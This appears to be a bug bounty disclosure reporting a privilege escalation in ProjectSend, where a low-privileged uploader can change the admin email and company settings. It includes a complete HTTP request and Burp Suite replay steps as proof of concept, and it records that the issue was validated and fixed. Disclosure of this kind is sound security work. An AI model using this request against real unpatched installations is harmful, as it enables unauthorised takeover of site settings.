Incorrect Privilege Assignment in projectsend/projectsend

Valid

Reported on

Jul 2nd 2021


💥 BUG

privilege escalation bug to update admin email-address and company name etc .

💥 IMPACT

unprivileged user can update admin email-address and company name etc

💥 STEP TO REPRODUCE

1. From admin account goto http://localhost/projectsend2/users.php and add new user called user-B with uploader role .
2. Now goto user-B account and there is no options to update company name.
Now user-B sent bellow request to to update company-name ,company-email.\

POST /projectsend2/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------22961416713886144272049413533
Content-Length: 1742
Origin: http://localhost
Connection: close
Referer: http://localhost/projectsend2/options.php?section=email
Cookie: PHPSESSID=c7uh0bkpk72ffue6lbbcbnmtjm; 
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="csrf_token"

2295df1e93d7e67b6c756bb4157d54d82639238b35968e79261f9e180294d4b1
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="section"

email
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="admin_email_address"

admin@localhost.com
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_from_name"

bugbounty_by_user
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_copy_addresses"


-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="notifications_max_tries"

2
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="notifications_max_days"

15
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_system_use"

mail
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_user"


-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_pass"


-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_host"


-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_port"


-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_auth"

none
-----------------------------22961416713886144272049413533--

Here in this request change csrf tokken with user-B csrf token and forward the request in burpsuite interception tool and see user-B can company-name, email-id etc.
So, user-B with uploader can update company-name, email-id etc .

We have contacted a member of the projectsend team and are waiting to hear back a year ago
Ignacio Nelson validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Ignacio Nelson confirmed that a fix has been merged on beacba 4 months ago
Ignacio Nelson has been awarded the fix bounty
to join this conversation